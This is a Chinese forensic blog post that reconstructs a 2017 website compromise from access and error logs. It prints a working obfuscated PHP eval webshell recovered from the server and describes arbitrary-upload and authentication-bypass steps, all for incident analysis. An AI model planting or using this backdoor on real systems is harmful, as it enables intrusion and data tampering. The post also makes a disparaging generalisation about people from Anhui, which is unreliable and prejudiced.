夜已深，人已睡

　　而我們的路，才剛剛起航。

　　在下給大家獻上一個鉅作，可花了我不少時間!

　　首先我們來認識兩個日誌。

　　www.xxx.com-access_log

　　www.xxx.com-error_log

　　一個是錯誤日誌，一個是普通的日誌。

　　首先我們接到一位客戶的客戶的求助，網站被入侵，資料被篡改，伺服器已關閉。於是開始了一波日誌追凶之路。

　　首先我們先把他們的網站後臺訪問記錄給清理出來(黑客一般都需要進後臺改資料)

　　[HTML] 純文字檢視 複製程式碼

　　?1資料1：[url]http://www.xxx.com/index.php?g=admin&m=index&a=index[/url]]http://www.xxx.com/index.php?g=admin&m=index&a=index網站後臺主頁

　　首先客戶的IP地址為：154.124.124.* 就在無其他外地IP

　　那麼也就是說只要是別的IP地址成功的訪問了後臺的主頁，那他就是黑客了!

　　我們先查的第一個日誌檔案就是 www.xxx.com-access_log這個檔案是用來儲存每個使用者訪問了那些檔案的日誌(css，js，png圖片啥的都在內)

　　總共36個訪問記錄

　　[HTML] 純文字檢視 複製程式碼

　　?1

　　2

　　3183.164.254.195 - - [25/Jul/2017:13:49:43 +0800] "GET /index.php?g=admin&m=index&a=index HTTP/1.1" 302 -

　　183.164.254.195 - - [25/Jul/2017:13:49:45 +0800] "GET /index.php?g=admin&m=public&a=login HTTP/1.1" 200 2384

 183.164.254.195 - - [25/Jul/2017:13:49:46 +0800] "GET /index.php?g=api&m=checkcode&a=index&length=4&font_size=20&width=248&height=42&use_noise=1&use_curve=0 HTTP/1.1" 200 1355

　　突然發現了一個IP地址為：183.164.254.195(安徽省淮北市 電信 )

　　登陸時間：2017年7月25日 13:49:43秒 (也就是客戶發現數據被篡改的這天)

　　(我沒地域黑的意思，安徽這邊做黑產的實在不少，於是判定這就是黑客IP)

　　好傢伙，500多條請求記錄，於是我們將這個IP地址作為搜尋依據，開始摸下去。

　　可以看到他在瀏覽後臺，所以在請求JS等檔案，繼續跟蹤，看看還幹了什麼。

　　183.164.254.195 - - [25/Jul/2017:13:51:53 +0800] "GET /index.php?g=&m=admin_post&a=add&term= HTTP/1.1" 200 10760

　　可以看到，這名黑客在新增網站後臺管理員。

　　接著

　　183.164.254.195 - - [25/Jul/2017:13:52:00 +0800] "GET /index.php?g=Asset&m=Ueditor&a=upload&action=config&&noCache=1500961918833 HTTP/1.1" 200 2105

　　我們看到了他正在使用百度編輯器的檔案上傳功能，(簡單意思：正在上傳檔案)

　　接著繼續跟下去發現了他訪問了一個index.php檔案

　　183.164.254.195 - - [25/Jul/2017:13:53:37 +0800] "POST /plugins/Mobileverify/View/assets/images/index.php HTTP/1.1" 200 -

　　於是我們查看了伺服器該處檔案的原始碼，果然是一個一句話

　　<?php

　　error_reporting(0);

　　$a=array($_REQUEST['c']=>"");

　　$b=array('');

　　array_diff_uassoc($a,$b,create_function('$a','return @eval(base64_decode($a));'));

　　?>

　　這就是黑客的一句話木馬，至此之中我們還未發現他是如何獲取到的密碼。繼續往下跟

　　多次在訪問這個一句話木馬，推測是在使用菜刀進行一些操作

　　繼續跟

　　183.164.254.195 - - [25/Jul/2017:13:55:13 +0800] "POST /index.php?g=Asset&m=Ueditor&a=upload&action=uploadimage HTTP/1.1" 200 115

　　上面的這段程式碼是在使用百度編輯器的上傳功能，緊接著下面就是出現了php檔案

　　183.164.254.195 - - [25/Jul/2017:13:55:26 +0800] "GET //data//upload//ueditor//20170725//5976dd41ba74e.php HTTP/1.1" 200 -

　　183.164.254.195 - - [25/Jul/2017:13:55:27 +0800] "GET //data//upload//ueditor//20170725//5976dd41ba74e.php HTTP/1.1" 200 -

　　於是推測這個編輯器可能存在任意檔案上傳，那麼問題來了，他是怎麼進的後臺?

　　然後這名黑客一直在使用這個一句話檔案，進行一些操作，於是我猜想到了這名黑客上傳的第一個檔案index.php是準備用來作為自己再次攻進來的後門，所以並未直接使用哪個一句話，而是直接用的編輯器上傳的新的一句話木馬。

　　在14:07：55秒他進行了

　　183.164.254.195 - - [25/Jul/2017:14:07:55 +0800] "GET /index.php?g=mill&m=dealadmin&a=force HTTP/1.1" 200 15294

　　一個刪除管理員的操作。

　　(在剛進後臺的時候他就立即進行了新增管理員操作，接著他發現了後臺編輯器存在上傳漏洞，於是又回去刪除掉了剛開始新增的管理員，防止被發現。)

　　接著

　　183.164.254.195 - - [25/Jul/2017:14:10:57 +0800] "GET /index.php?g=Admin&m=Menu&a=edit&id=109&menuid= HTTP/1.1" 200 17203

　　對編號為109的管理員進行了修改操作

　　183.164.254.195 - - [25/Jul/2017:14:12:45 +0800] "GET /index.php?g=User&m=indexadmin&a=edituser&id=4131 HTTP/1.1" 200 3442

　　接著對會員使用者ID為4131的進行改動

　　183.164.254.195 - - [25/Jul/2017:14:22:14 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=21 HTTP/1.1" 200 2928

　　修改了管理員ID為21的手機號

　　(他這樣做是因為後臺登陸需要手機號，修改密碼也可以在前臺找回密碼處修改管理員密碼。)

　　這招確實高。

　　接著，又TM改了管理員編號為37的。。我日

　　183.164.254.195 - - [25/Jul/2017:14:29:37 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=37 HTTP/1.1" 200 2928

　　183.164.243.116 - - [25/Jul/2017:15:18:09 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=162 HTTP/1.1" 200 2929

　　183.164.243.116 - - [25/Jul/2017:17:24:25 +0800] "GET /index.php?g=User&m=indexadmin&a=editmobile&id=4181 HTTP/1.1" 200 2919

　　算下來，這名黑客總共篡改了5個管理員賬戶的手機號。也tm是個人才

　　可見黑客對這個網站的重視程度。

　　最後黑客的日誌中斷於：

　　183.164.243.116 - - [25/Jul/2017:19:19:41 +0800]

　　3點進來的，5點走的。

　　這名黑客追蹤完畢，我繼續看後臺日誌

　　起來繼續寫

　　220.173.123.32 - - [25/Jul/2017:14:08:18 +0800] "GET /index.php?g=Admin&m=Slide&a=index HTTP/1.1" 200 5800

　　突然一個IP地址又出現在了我的眼前，這個IP地址在2點08分18秒進入過後臺，上一名黑客是在3進來的，那麼他們是否有某種聯絡?

　　隨後我對這名黑客的操作進行了分析

　　220.173.123.32 - - [25/Jul/2017:14:11:33 +0800] "POST /index.php?g=asset&m=asset&a=plupload HTTP/1.1" 200 304

　　進行上傳操作

　　上傳第一個圖片

　　220.173.123.32 - - [25/Jul/2017:14:12:12 +0800] "GET /data//upload//admin//20170725//5976e115d4414.jpg HTTP/1.1" 200 4819

　　然後下面這條我給大家解讀一下，他是在利用Nginx的解析漏洞

　　220.173.123.32 - - [25/Jul/2017:14:12:16 +0800] "GET /data//upload//admin//20170725//5976e115d4414.jpg/.php HTTP/1.1" 404 251

　　該名黑客對後臺進行多番操作(改資料，新增管理賬戶等，比如)

　　220.173.123.32 - - [25/Jul/2017:14:14:48 +0800] "GET /index.php?g=Admin&m=ad&a=add HTTP/1.1" 200 2684

　　接著他又再次去使用檔案上傳功能，但是這次卻突然上傳成功了

　　220.173.123.32 - - [25/Jul/2017:14:18:42 +0800] "GET /data/upload/admin/20170725/5976e1e4373de.php HTTP/1.1" 200 -

　　我懷疑是183那名黑客教他的

　　隨後這名黑客利用上傳好了的shell，開始進行菜刀操作，這裡就不列舉了

　　這名黑客在6點41分退出後臺，刪除了原先新增的賬戶

　　220.173.123.32 - - [25/Jul/2017:18:41:43 +0800] "POST /index.php?g=Mill&m=Dealadmin&a=deal HTTP/1.1" 200 14459

　　在這裡的第一個日誌過程中，我們終究未發現這夥人是如何拿到後臺密碼進入後臺的，下一個日誌即將為大家揭祕。

　　第二個日誌我就繼續以這兩個黑客IP為線索，開始進行下一步追蹤

　　我直接定位了220.173.123.32的操作記錄

　　然後分析是否留了後門

　　[Tue Jul 25 18:41:43.948532 2017] [:error] [pid 1563:tid 139622384338688] [client 220.173.123.32:21604] PHP Notice: Use of undefined constant flase - assumed 'flase' in /data/WebRoot/www.xxx.com/index.php on line 21, referer: http://www.xxx.com/index.php?g=admin&m=index&a=index

　　在這篇日誌中，這名黑客其實進行的都是一些後臺操作，毫無技術含量，也沒有留後門什麼的，看起來不像是一個技術人員，倒像是一個洗錢專家

　　於是我們對另外一名183的黑客進行追蹤

　　我們看到他對20170724.rar進行了訪問操作

　　[client 183.164.254.195:63171] PHP Notice: Use of undefined constant flase - assumed 'flase' in /data/WebRoot/www.xxx.com/index.php on line 21, referer: http://www.xxx.com/20170724.rar

　　但是返回404

　　接著對一個檔案進行了更改

　　[client 183.164.254.195:61753] PHP Fatal error: Can't use function return value in write context in /data/WebRoot/www.xxx.com/application/Portal/Controller/AdminPageController.class.php on line 127, referer: http://www.xxx.com/index. ... m=index&a=index

　　AdminPageController.class.php 我們立即對這個檔案的127行進行了檢視，發現他去掉了驗證。

　　首先我們知道，後臺是存在任意檔案上傳的，但是都需要登陸後臺，如果客戶方全部修改密碼，他們的原先小把戲肯定就能顯形，而這裡他進行的更改就是無需登陸，可直接通過burp進行上傳任意檔案。

　　這條日誌的發現，使我們徹底明白了他的入侵方式

　　[client 183.164.254.195:62221] PHP Notice: Use of undefined constant flase - assumed 'flase' in /data/WebRoot/www.xxx.com/index.php on line 21, referer: http://www.xxx.com//data//upload//ueditor//20170725//5976eaa7e9225.php

　　原來是前臺會員中心的頭像上傳漏洞

　　------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

　　這裡對這次黑客攻擊技術性做一次評估和分析

　　首先這名黑客利用前臺任意檔案上傳漏洞，接著獲取到了shell，然後該名黑客解密了其中一個管理人員的密碼，登陸後臺，接著對後臺部分管理人員的繫結手機號篡改，以方便下次入侵。(確實機智，前臺可根據簡訊驗證碼修改後臺管理員密碼，但是足以可見這是一個犯罪經驗比較豐富的團伙)接著應該叫做Boss的220.173.123.32出場，開始對後臺進行金額上面的篡改，以達到洗錢的目的，然後作為技術人員的安徽黑客183.164.254.195就開始進行留後門操作，他們都是同一時間進行的操作，而且還很聰明的修改了檔案上傳功能的許可權驗證，以達到未授權訪問的目的，這樣即使防毒軟體怎麼掃描都無法掃描出來。